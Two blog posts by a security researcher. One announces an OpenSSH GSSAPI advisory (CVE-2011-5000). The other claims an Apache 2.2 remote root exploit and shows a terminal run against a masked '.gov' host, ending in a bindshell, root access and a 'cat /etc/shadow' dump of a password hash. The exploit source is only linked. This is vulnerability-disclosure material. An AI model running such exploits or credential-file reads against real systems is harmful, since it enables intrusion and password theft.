First of August 2011 was the date when I decided to publish advisory about vulnerability in OpenSSH  daemon. If someone read carefully advisory he will discover this bug was found in 2008. It took me quite a long time to publish details about vulnerability. I did it from a few reasons; at first I didn’t have a time to analyse details and bug was promising (pre-authentication). In this case advisory will never be public. Problem exists in GSSAPI module (native in OpenSSH source code). I checked many packages in many systems and it seems this method of authentication (gssapi-with-mic) is enabled by default in most of them. Everything was looking very promising 😉 After some months I returned to that problem and discovered that vulnerability is _EXACTLY_ after authentication (one call) so (un)fortunately this is post-authentication bug. Next I tried to find some other way to exploit it. Again I was starting to be busy and drop this project. Because of that finally I published the advisory maybe someone else is interesting to play with that. More information can be found here and here 🙂

I’m writing this post because I’m happy to inform that my research officially got Common Vulnerabilities and Exposures (CVE) number (CVE-2011-5000).

The latest version of OpenSSH has fix for this problem and can be found here. Fix exists only in the original source code but usually NOT in the official packages of popular systems (f.ex. like RedHat – more info here). Problem was solved by Markus Friedl and I would like to thank him for cooperation 🙂

 

Best regards,

Adam

I haven’t been posting on this blog for a while. It doesn’t mean I’m not doing research – I’m just not a big fan of releasing anything and most of my work stays private. Anyway because Apache released new version of their Http Server one of my research was burned. New version of Apache fixes remote code execution vulnerability in default instalation! This vulnerability is quite old and have been exploited in the wild for last 5 years 🙂

This vulnerability is fixed and no longer be 0day I decided to publish exploit code for this bug. How is it work? Find below:

pi3-darkstar ~ # gcc Apache_0day.c -o Apache_0day
pi3-darkstar ~ # ./Apache_0day -h

    ...::: -=[ Apache 2.2.xx 0day exploit  (by Adam 'pi3' Zabrocki) ]=- :::...

    Usage: ./Apache_0day <options>

        Options:
             -v <victim>
             -p <port>
             -h this help screen

 pi3-darkstar ~ # ./Apache_0day -v xxx.gov

    ...::: -=[ Apache 2.2.xx 0day exploit  (by Adam 'pi3' Zabrocki) ]=- :::... 

            [+] Host alive? ... YES!
            [+] Connecting... DONE!
            [+] Checking server... VULNERABLE!
            [+] Calculating zones... DONE!
            [+] Let's play with APR allocator....................................................................................................
................................................................................................................................................................
.................................................................................................... DONE!
            [+] Spawning childs................................................................................... DONE!
            [+] Addresses? ... YES!
                    [+] @APR child 1... DONE! (0xffffffffbffffe01)
                    [+] @APR child 2... DONE! (0xffffffffbceffe01)
            [+] Trying ret-into-system...
            [+] Connecting to bindshell...

pi3 was here :-) Executing shell...
uid=0(root) gid=0(root) grupy=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) Linux pi3-test 2.6.32.13-grsec #1 SMP Thu May 13 17:07:21 CEST 2010 i686 i686 i386 GNU/Linux
# cat /etc/shadow|head -1
root:$6$vxdYpCQF$0qPMKMwxwVxLGNSZbOUYxK0n33C2lxCPdQq5n5rtr70dNkNPjEWCmjvKCZOKVP.cOM2PMc3JtOruts7F53/hp.:15104:0:::::
# exit;!

Looks nice, isn’t it? 🙂 Now realize it was used in the wild for last 5 years… so better check your machine if no rootkits was installed 🙂

As I promised at the beginning of this post, here is the exploit code: Apache 0day.

 

Best regards,

Adam Zabrocki